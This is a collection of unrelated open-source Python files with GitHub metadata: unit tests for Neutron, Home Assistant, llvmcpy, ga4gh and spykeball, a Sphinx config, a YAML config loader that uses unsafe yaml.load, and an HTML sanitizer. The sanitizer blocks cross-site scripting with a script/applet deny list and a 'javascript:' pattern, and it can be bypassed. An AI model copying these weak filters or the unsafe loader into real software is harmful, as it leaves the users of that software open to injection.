"ip_address": "1.2.3.4",
"instance_id": "foo_instance_id"
}
self._test_lsn_port_host_action(lsnlib.lsn_port_metadata_host_remove,
"metadata-proxy", "remove_host", host)
|
{
"content_hash": "f5304e9eff4fb085b7b706f40d372f73",
"timestamp": "",
"source": "github",
"line_count": 326,
"max_line_length": 78,
"avg_line_length": 39.38650306748466,
"alnum_prop": 0.5407320872274143,
"repo_name": "Comcast/neutron",
"id": "86daa39aa241ef309006a09add032f77e7f33330",
"size": "13463",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "neutron/tests/unit/nicira/test_lsn_lib.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "CSS",
"bytes": "37307"
},
{
"name": "JavaScript",
"bytes": "67928"
},
{
"name": "Python",
"bytes": "6906340"
},
{
"name": "Shell",
"bytes": "8983"
},
{
"name": "XSLT",
"bytes": "50907"
}
],
"symlink_target": ""
}
|
AUTHOR = u'Adrian Sampson'
# General configuration
extensions = ['sphinx.ext.autodoc', 'sphinx.ext.extlinks']
exclude_patterns = ['_build']
source_suffix = '.rst'
master_doc = 'index'
project = u'beets'
copyright = u'2012, Adrian Sampson'
version = '1.3'
release = '1.3.17'
pygments_style = 'sphinx'
# External links to the bug tracker.
extlinks = {
'bug': ('https://github.com/sampsyo/beets/issues/%s', '#'),
'user': ('https://github.com/%s', ''),
}
# Options for HTML output
htmlhelp_basename = 'beetsdoc'
# Options for LaTeX output
latex_documents = [
('index', 'beets.tex', u'beets Documentation',
AUTHOR, 'manual'),
]
# Options for manual page output
man_pages = [
('reference/cli', 'beet', u'music tagger and library organizer',
[AUTHOR], 1),
('reference/config', 'beetsconfig', u'beets configuration file',
[AUTHOR], 5),
]
|
{
"content_hash": "9bb795e3d1532cb3b7506550ce1a3c7d",
"timestamp": "",
"source": "github",
"line_count": 40,
"max_line_length": 68,
"avg_line_length": 21.875,
"alnum_prop": 0.6502857142857142,
"repo_name": "LordSputnik/beets",
"id": "a636220792688f770f3876cea94332394923852b",
"size": "900",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "docs/conf.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "2951"
},
{
"name": "HTML",
"bytes": "3307"
},
{
"name": "JavaScript",
"bytes": "85950"
},
{
"name": "Python",
"bytes": "1671957"
},
{
"name": "Shell",
"bytes": "7413"
}
],
"symlink_target": ""
}
|
"""Test the Dyson air quality component."""
import json
from unittest import mock
import asynctest
from libpurecool.dyson_pure_cool import DysonPureCool
from libpurecool.dyson_pure_state_v2 import DysonEnvironmentalSensorV2State
from homeassistant.components import dyson as dyson_parent
from homeassistant.components.air_quality import (
ATTR_NO2,
ATTR_PM_2_5,
ATTR_PM_10,
DOMAIN as AIQ_DOMAIN,
)
import homeassistant.components.dyson.air_quality as dyson
from homeassistant.helpers import discovery
from homeassistant.setup import async_setup_component
def _get_dyson_purecool_device():
"""Return a valid device as provided by the Dyson web services."""
device = mock.Mock(spec=DysonPureCool)
device.serial = "XX-XXXXX-XX"
device.name = "Living room"
device.connect = mock.Mock(return_value=True)
device.auto_connect = mock.Mock(return_value=True)
device.environmental_state.particulate_matter_25 = "0014"
device.environmental_state.particulate_matter_10 = "0025"
device.environmental_state.nitrogen_dioxide = "0042"
device.environmental_state.volatile_organic_compounds = "0035"
return device
def _get_config():
"""Return a config dictionary."""
return {
dyson_parent.DOMAIN: {
dyson_parent.CONF_USERNAME: "email",
dyson_parent.CONF_PASSWORD: "password",
dyson_parent.CONF_LANGUAGE: "GB",
dyson_parent.CONF_DEVICES: [
{"device_id": "XX-XXXXX-XX", "device_ip": "192.168.0.1"}
],
}
}
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
"libpurecool.dyson.DysonAccount.devices",
return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_aiq_attributes(devices, login, hass):
"""Test state attributes."""
await async_setup_component(hass, dyson_parent.DOMAIN, _get_config())
await hass.async_block_till_done()
fan_state = hass.states.get("air_quality.living_room")
attributes = fan_state.attributes
assert fan_state.state == "14"
assert attributes[ATTR_PM_2_5] == 14
assert attributes[ATTR_PM_10] == 25
assert attributes[ATTR_NO2] == 42
assert attributes[dyson.ATTR_VOC] == 35
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
"libpurecool.dyson.DysonAccount.devices",
return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_aiq_update_state(devices, login, hass):
"""Test state update."""
device = devices.return_value[0]
await async_setup_component(hass, dyson_parent.DOMAIN, _get_config())
await hass.async_block_till_done()
event = {
"msg": "ENVIRONMENTAL-CURRENT-SENSOR-DATA",
"time": "2019-03-29T10:00:01.000Z",
"data": {
"pm10": "0080",
"p10r": "0151",
"hact": "0040",
"va10": "0055",
"p25r": "0161",
"noxl": "0069",
"pm25": "0035",
"sltm": "OFF",
"tact": "2960",
},
}
device.environmental_state = DysonEnvironmentalSensorV2State(json.dumps(event))
for call in device.add_message_listener.call_args_list:
callback = call[0][0]
if type(callback.__self__) == dyson.DysonAirSensor:
callback(device.environmental_state)
await hass.async_block_till_done()
fan_state = hass.states.get("air_quality.living_room")
attributes = fan_state.attributes
assert fan_state.state == "35"
assert attributes[ATTR_PM_2_5] == 35
assert attributes[ATTR_PM_10] == 80
assert attributes[ATTR_NO2] == 69
assert attributes[dyson.ATTR_VOC] == 55
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
"libpurecool.dyson.DysonAccount.devices",
return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_component_setup_only_once(devices, login, hass):
"""Test if entities are created only once."""
config = _get_config()
await async_setup_component(hass, dyson_parent.DOMAIN, config)
await hass.async_block_till_done()
discovery.load_platform(hass, AIQ_DOMAIN, dyson_parent.DOMAIN, {}, config)
await hass.async_block_till_done()
assert len(hass.data[dyson.DYSON_AIQ_DEVICES]) == 1
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
"libpurecool.dyson.DysonAccount.devices",
return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_aiq_without_discovery(devices, login, hass):
"""Test if component correctly returns if discovery not set."""
await async_setup_component(hass, dyson_parent.DOMAIN, _get_config())
await hass.async_block_till_done()
add_entities_mock = mock.MagicMock()
dyson.setup_platform(hass, None, add_entities_mock, None)
assert add_entities_mock.call_count == 0
@asynctest.patch("libpurecool.dyson.DysonAccount.login", return_value=True)
@asynctest.patch(
"libpurecool.dyson.DysonAccount.devices",
return_value=[_get_dyson_purecool_device()],
)
async def test_purecool_aiq_empty_environment_state(devices, login, hass):
"""Test device with empty environmental state."""
await async_setup_component(hass, dyson_parent.DOMAIN, _get_config())
await hass.async_block_till_done()
device = hass.data[dyson.DYSON_AIQ_DEVICES][0]
device._device.environmental_state = None
assert device.state is None
assert device.particulate_matter_2_5 is None
assert device.particulate_matter_10 is None
assert device.nitrogen_dioxide is None
assert device.volatile_organic_compounds is None
|
{
"content_hash": "1b8a02df7ab1da8653c6c004d23cd243",
"timestamp": "",
"source": "github",
"line_count": 159,
"max_line_length": 83,
"avg_line_length": 35.716981132075475,
"alnum_prop": 0.6849797499559782,
"repo_name": "Teagan42/home-assistant",
"id": "ed2fbed34f3d8fc3fe1df1b34b271fa6ef462719",
"size": "5679",
"binary": false,
"copies": "3",
"ref": "refs/heads/dev",
"path": "tests/components/dyson/test_air_quality.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "Python",
"bytes": "19774313"
},
{
"name": "Shell",
"bytes": "6846"
}
],
"symlink_target": ""
}
|
"""Game Tests."""
import pytest
from spykeball import game
from spykeball import util
@pytest.fixture(scope='session')
def sample_games(sample_players):
"""Create Sample Games from sample_players."""
length = sample_players['length'] / 4
players = sample_players['players']
games = []
for p1, p2, p3, p4 in util.groupby(players, 4):
games.append(game.Game(p1, p2, p3, p4))
return {'games': games, 'length': length}
def test_game_iteration(sample_games):
"""Test the iteration protocol on the game class."""
for gameobj in sample_games:
for event, true_event in zip(gameobj, gameobj._actionlist):
assert event == true_event
def test_game_containment(sample_games):
"""Test the containment of players or actions in game objects."""
assert True
|
{
"content_hash": "91771d835ae7d2b556214b8e6073cd85",
"timestamp": "",
"source": "github",
"line_count": 29,
"max_line_length": 69,
"avg_line_length": 28.20689655172414,
"alnum_prop": 0.6699266503667481,
"repo_name": "bhgomes/spykeball",
"id": "fc19dbea4891f452b8a47f3a78ca4db1f5d05952",
"size": "818",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "tests/game_test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "53382"
},
{
"name": "Shell",
"bytes": "521"
}
],
"symlink_target": ""
}
|
import unittest
from llvmcpy import llvm
from packaging import version
module_source = """; ModuleID = 'example.c'
target datalayout = "e-m:e-i64:64-f80:128-n8:16:32:64-S128"
target triple = "x86_64-pc-linux-gnu"
; Function Attrs: nounwind uwtable
define i32 @function2() {
ret i32 42
}
; Function Attrs: nounwind uwtable
define i32 @function1() {
%1 = call i32 @function2()
%2 = call i32 @function2()
ret i32 %1
}
; Function Attrs: nounwind uwtable
define i32 @main(i32, i8**) {
%3 = alloca i32, align 4
%4 = alloca i32, align 4
%5 = alloca i8**, align 8
store i32 0, i32* %3, align 4
store i32 %0, i32* %4, align 4
store i8** %1, i8*** %5, align 8
%6 = call i32 @function1()
ret i32 %6
}
"""
if version.parse(llvm.version) >= version.parse("7.0"):
module_source = module_source + """
!llvm.module.flags = !{!0}
!0 = !{ i32 4, !"foo", i32 42 }
"""
def load_module(ir):
context = llvm.get_global_context()
buffer = llvm.create_memory_buffer_with_memory_range_copy(ir,
len(ir),
"example")
return context.parse_ir(buffer)
def get_function_number(ir):
module = load_module(ir)
return len(list(module.iter_functions()))
def get_non_existing_basic_block(ir):
module = load_module(ir)
first_function = list(module.iter_functions())[0]
first_basic_block = list(first_function.iter_basic_blocks())[0]
first_basic_block.get_next().first_instruction()
class TestSuite(unittest.TestCase):
def test_function_count(self):
self.assertEqual(get_function_number(module_source), 3)
def test_null_ptr(self):
with self.assertRaises(AttributeError):
get_non_existing_basic_block(module_source)
def test_resolve_enums(self):
assert llvm.Opcode[llvm.Switch] == 'Switch'
assert llvm.Opcode['Switch'] == llvm.Switch
def test_translate_null_ptr_to_none(self):
module = load_module(module_source)
first_function = list(module.iter_functions())[0]
first_basic_block = list(first_function.iter_basic_blocks())[0]
first_instruction = first_basic_block.first_instruction
assert first_instruction.is_a_binary_operator() is None
def test_value_as_key(self):
module = load_module(module_source)
function1 = module.get_named_function("function1")
first_basic_block = function1.get_first_basic_block()
first_instruction = first_basic_block.get_first_instruction()
second_instruction = first_instruction.get_next_instruction()
operand1 = first_instruction.get_operand(0)
operand2 = second_instruction.get_operand(0)
dictionary = {}
dictionary[operand1] = 42
assert operand2 in dictionary
def test_sized_string_return(self):
string = "a\0b\0c"
value = llvm.md_string(string, len(string))
self.assertEqual(value.get_md_string(), string)
self.assertEqual(value.get_md_string(encoding=None), string.encode('ascii'))
def test_metadata_flags(self):
if version.parse(llvm.version) < version.parse("7.0"):
return
module = load_module(module_source)
length = llvm.ffi.new("size_t *")
metadata_flags = module.copy_module_flags_metadata(length)
behavior = metadata_flags.module_flag_entries_get_flag_behavior(0)
key = metadata_flags.module_flag_entries_get_key(0)
assert behavior == 3
assert key == "foo"
if __name__ == '__main__':
unittest.main()
|
{
"content_hash": "a61c1d4fdfbbcaa6f6298f962fdb9963",
"timestamp": "",
"source": "github",
"line_count": 107,
"max_line_length": 84,
"avg_line_length": 33.850467289719624,
"alnum_prop": 0.6300386526780785,
"repo_name": "revng/llvmcpy",
"id": "56ff6d2788f4811926fb205e3a7878ae240f43e2",
"size": "3622",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "llvmcpy/test.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Python",
"bytes": "36097"
}
],
"symlink_target": ""
}
|
"""
Unit tests for the sql backend
"""
from __future__ import division
from __future__ import print_function
from __future__ import unicode_literals
import unittest
import ga4gh.sqliteBackend as sqliteBackend
import tests.paths as paths
class SqliteDB(sqliteBackend.SqliteBackedDataSource):
def __init__(self, dbPath=paths.testDataRepo):
super(SqliteDB, self).__init__(dbPath)
self._readGroupSql = "SELECT id, name FROM ReadGroup"
def ping(self):
sql = "SELECT 1"
query = self._dbconn.execute(sql)
row = query.fetchone()
result = int(row.keys()[0])
return result
def fetchOneMethod(self):
sql = "SELECT id, name FROM ReadGroup LIMIT 1"
query = self._dbconn.execute(sql)
rowDict = sqliteBackend.fetchOne(query)
return rowDict
def getReadGroupRows(self):
sql = self._readGroupSql
query = self._dbconn.execute(sql)
rows = query.fetchall()
return rows
def iterativeFetchMethod(self):
sql = self._readGroupSql
query = self._dbconn.execute(sql)
iterator = sqliteBackend.iterativeFetch(query, 2)
return iterator
class TestSqlBackend(unittest.TestCase):
def setUp(self):
self._db = SqliteDB()
def testPing(self):
result = None
with self._db as db:
result = db.ping()
self.assertEqual(result, 1)
def testLimitClause(self):
noArgs = sqliteBackend.limitsSql()
zeroArgs = sqliteBackend.limitsSql(0, 0)
self.assertEqual(noArgs, zeroArgs)
with self.assertRaises(Exception):
sqliteBackend.limitsSql(startIndex=5)
limit = sqliteBackend.limitsSql(startIndex=1, maxResults=2)
self.assertEqual(limit, " LIMIT 1, 2")
limit = sqliteBackend.limitsSql(maxResults=3)
self.assertEqual(limit, " LIMIT 3")
def _testRowDict(self, rowDict):
self.assertEqual(len(rowDict.keys()), 2)
self.assertIn("id", rowDict.keys())
self.assertIn("name", rowDict.keys())
self.assertIsInstance(rowDict["id"], unicode)
self.assertIsInstance(rowDict["name"], unicode)
def testRowToDict(self):
rows = None
with self._db as db:
rows = db.getReadGroupRows()
row = rows[0]
rowDict = sqliteBackend.sqliteRowToDict(row)
self._testRowDict(rowDict)
def testRowsToDicts(self):
rows = None
with self._db as db:
rows = db.getReadGroupRows()
rowDicts = sqliteBackend.sqliteRowsToDicts(rows)
for rowDict in rowDicts:
self._testRowDict(rowDict)
def testIterativeFetch(self):
iterator = None
with self._db as db:
iterator = db.iterativeFetchMethod()
for rowDict in iterator:
self._testRowDict(rowDict)
iteratorLen = len(list(db.iterativeFetchMethod()))
regularLen = len(db.getReadGroupRows())
self.assertEqual(iteratorLen, regularLen)
def testFetchOne(self):
rowDict = None
with self._db as db:
rowDict = db.fetchOneMethod()
self._testRowDict(rowDict)
|
{
"content_hash": "051a4f0a294ee79a0d544fd16acd7be8",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 67,
"avg_line_length": 29.74074074074074,
"alnum_prop": 0.6229763387297634,
"repo_name": "ohsu-computational-biology/server",
"id": "d0dbd558ff82e5a67c2a72b6fe231058021892f1",
"size": "3212",
"binary": false,
"copies": "1",
"ref": "refs/heads/g2p-2.5",
"path": "tests/unit/test_sql_backend.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "7380"
},
{
"name": "Jupyter Notebook",
"bytes": "41926"
},
{
"name": "Python",
"bytes": "1238265"
},
{
"name": "Shell",
"bytes": "973"
}
],
"symlink_target": ""
}
|
import os
import yaml
from astropy import units as u
from pocs import hardware
from pocs.utils import listify
from warnings import warn
def load_config(config_files=None, simulator=None, parse=True, ignore_local=False):
""" Load configuation information """
# Default to the pocs.yaml file
if config_files is None:
config_files = ['pocs']
config_files = listify(config_files)
config = dict()
config_dir = '{}/conf_files'.format(os.getenv('POCS'))
for f in config_files:
if not f.endswith('.yaml'):
f = '{}.yaml'.format(f)
if not f.startswith('/'):
path = os.path.join(config_dir, f)
else:
path = f
try:
_add_to_conf(config, path)
except Exception as e:
warn("Problem with config file {}, skipping. {}".format(path, e))
# Load local version of config
if not ignore_local:
local_version = os.path.join(config_dir, f.replace('.', '_local.'))
if os.path.exists(local_version):
try:
_add_to_conf(config, local_version)
except Exception:
warn("Problem with local config file {}, skipping".format(local_version))
if simulator is not None:
config['simulator'] = hardware.get_simulator_names(simulator=simulator)
if parse:
config = parse_config(config)
return config
def parse_config(config):
# Add units to our location
if 'location' in config:
loc = config['location']
for angle in ['latitude', 'longitude', 'horizon', 'twilight_horizon']:
if angle in loc:
loc[angle] = loc[angle] * u.degree
loc['elevation'] = loc.get('elevation', 0) * u.meter
# Prepend the base directory to relative dirs
if 'directories' in config:
base_dir = os.getenv('PANDIR')
for dir_name, rel_dir in config['directories'].items():
if not rel_dir.startswith('/'):
config['directories'][dir_name] = '{}/{}'.format(base_dir, rel_dir)
return config
def save_config(path, config, clobber=True):
if not path.endswith('.yaml'):
path = '{}.yaml'.format(path)
if not path.startswith('/'):
config_dir = '{}/conf_files'.format(os.getenv('POCS'))
path = os.path.join(config_dir, path)
if os.path.exists(path) and not clobber:
warn("Path exists and clobber=False: {}".format(path))
else:
with open(path, 'w') as f:
f.write(yaml.dump(config))
def _add_to_conf(config, fn):
try:
with open(fn, 'r') as f:
c = yaml.load(f.read())
if c is not None and isinstance(c, dict):
config.update(c)
except IOError: # pragma: no cover
pass
|
{
"content_hash": "924abf596b4a3a647e8914951d61c114",
"timestamp": "",
"source": "github",
"line_count": 97,
"max_line_length": 93,
"avg_line_length": 29.175257731958762,
"alnum_prop": 0.5752650176678445,
"repo_name": "AstroHuntsman/POCS",
"id": "9250eafc8a08f790507a2515a4d3911856553738",
"size": "2830",
"binary": false,
"copies": "1",
"ref": "refs/heads/develop",
"path": "pocs/utils/config.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Arduino",
"bytes": "22750"
},
{
"name": "C++",
"bytes": "55452"
},
{
"name": "JavaScript",
"bytes": "13166"
},
{
"name": "Processing",
"bytes": "9037"
},
{
"name": "Python",
"bytes": "657327"
},
{
"name": "Shell",
"bytes": "13542"
}
],
"symlink_target": ""
}
|
import logging
import string
import re
from external.BeautifulSoup import BeautifulSoup, Comment
acceptable_tags = ['a', 'abbr', 'acronym', 'address', 'area', 'b', 'big',
'blockquote', 'br', 'button', 'caption', 'center', 'cite', 'code',
'col', 'colgroup', 'dd', 'del', 'dfn', 'dir', 'div', 'dl', 'dt', 'em',
'fieldset', 'font', 'form', 'h1', 'h2', 'h3', 'h4', 'h5', 'h6', 'hr',
'i', 'img', 'input', 'ins', 'kbd', 'label', 'legend', 'li', 'map',
'menu', 'ol', 'optgroup', 'option', 'p', 'pre', 'q', 's', 'samp',
'select', 'small', 'span', 'strike', 'strong', 'sub', 'sup', 'table',
'tbody', 'td', 'textarea', 'tfoot', 'th', 'thead', 'tr', 'tt', 'u',
'ul', 'var']
acceptable_attributes = ['abbr', 'accept', 'accept-charset', 'accesskey',
'action', 'align', 'alt', 'axis', 'border', 'cellpadding',
'cellspacing', 'char', 'charoff', 'charset', 'checked', 'cite', 'class',
'clear', 'cols', 'colspan', 'color', 'compact', 'coords', 'datetime',
'dir', 'disabled', 'enctype', 'for', 'frame', 'headers', 'height',
'href', 'hreflang', 'hspace', 'id', 'ismap', 'label', 'lang',
'longdesc', 'maxlength', 'media', 'method', 'multiple', 'name',
'nohref', 'noshade', 'nowrap', 'prompt', 'readonly', 'rel', 'rev',
'rows', 'rowspan', 'rules', 'scope', 'selected', 'shape', 'size',
'span', 'src', 'start', 'summary', 'tabindex', 'target', 'title',
'type', 'usemap', 'valign', 'value', 'vspace', 'width']
tags_for_trusted_source = ['object', 'param', 'embed', 'style']
attributes_for_trusted_source = ['style', 'wmode']
danger_elements = ['script', 'applet']
js_possible_attributes = ['href', 'src']
href_matcher = re.compile("^https?://", re.IGNORECASE)
javascript_matcher = re.compile("javascript:", re.IGNORECASE | re.MULTILINE)
class DangerousHTMLError(Exception):
def __init__(self, value):
self.value = chop_up(value) # Even when logging, could be displayed
def __str__(self):
return ' ~ '.join(self.value)
def sanitize_html(html='<p>No comment</p>', encoding=None,
allow_tags=[], allow_attributes=[],
blacklist_tags=[], blacklist_attributes=[],
trusted_source=False):
"""Parses HTML and tries to sanitize it using white list.
This method is a mishmash of code from Django snippets
(http://www.djangosnippets.org/snippets/169) and the
HTML sanitization of Universal Feed Parser. It explicitly
looks for valid hrefs to prevent scripts lurking in there.
Unfortunately, style, either as a tag or attribute, can
contain malicious script through executable CSS definitions.
So sanitized HTML cannot be colored or highlighted using styles.
Args:
html: HTML to be sanitized.
allow_tags: limit all tags to just this list
allow_attributes: limit all tags to just this list
allow_styling: should only be TRUE if you trust source
Returns:
Sanitized version of html
Raises:
DangerousHTMLError if the supplied HTML has dangerous elements.
"""
if not allow_tags:
allow_tags = acceptable_tags
if not allow_attributes:
allow_attributes = acceptable_attributes
allow_tags = [tag for tag in allow_tags if tag not in blacklist_tags]
allow_attributes = [tag for tag in allow_attributes
if tag not in blacklist_tags]
if trusted_source:
allow_attributes += attributes_for_trusted_source
allow_tags += tags_for_trusted_source
if isinstance(html, unicode) and not encoding:
logging.debug("Sanitizing unicode input.")
soup = BeautifulSoup(html,
convertEntities=BeautifulSoup.XHTML_ENTITIES)
else:
if not encoding:
encoding = 'latin-1'
logging.debug("Sanitizing string input, assuming %s", encoding)
soup = BeautifulSoup(html.decode(encoding, 'ignore'),
convertEntities=BeautifulSoup.XHTML_ENTITIES)
for comment in soup.findAll(
text = lambda text: isinstance(text, Comment)):
comment.extract()
for tag in soup.findAll(True):
if tag.name not in allow_tags:
tag.hidden = True
if tag.name in danger_elements:
raise DangerousHTMLError(html)
ok_attrs = []
for attr, val in tag.attrs:
if attr == 'href' and not href_matcher.match(val) and not trusted_source:
continue
if attr in allow_attributes:
if attr in js_possible_attributes:
if javascript_matcher.match(val):
raise DangerousHTMLError(html)
ok_attrs += [(attr, val)]
tag.attrs = ok_attrs
return soup.renderContents().decode('utf-8')
def chop_up(text, chop_size=5):
"Returns a list of smaller chunks of text"
chars = len(text)
blocks = chars / chop_size
if chars % chop_size:
blocks += 1
return [text[i*chop_size:min(chars,(i+1)*chop_size)]
for i in xrange(0, blocks)]
|
{
"content_hash": "ef5bf406a36b959c06a1f75b863380c8",
"timestamp": "",
"source": "github",
"line_count": 118,
"max_line_length": 85,
"avg_line_length": 43.067796610169495,
"alnum_prop": 0.6042896497441952,
"repo_name": "bcherry/adequatelygood",
"id": "daa981e2f7e118d4711cdee80ce9cd06f2fdd77c",
"size": "6201",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "utils/sanitizer.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "CSS",
"bytes": "52247"
},
{
"name": "HTML",
"bytes": "58467"
},
{
"name": "JavaScript",
"bytes": "94393"
},
{
"name": "Python",
"bytes": "305186"
},
{
"name": "Ruby",
"bytes": "149"
},
{
"name": "Shell",
"bytes": "96"
}
],
"symlink_target": ""
}
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.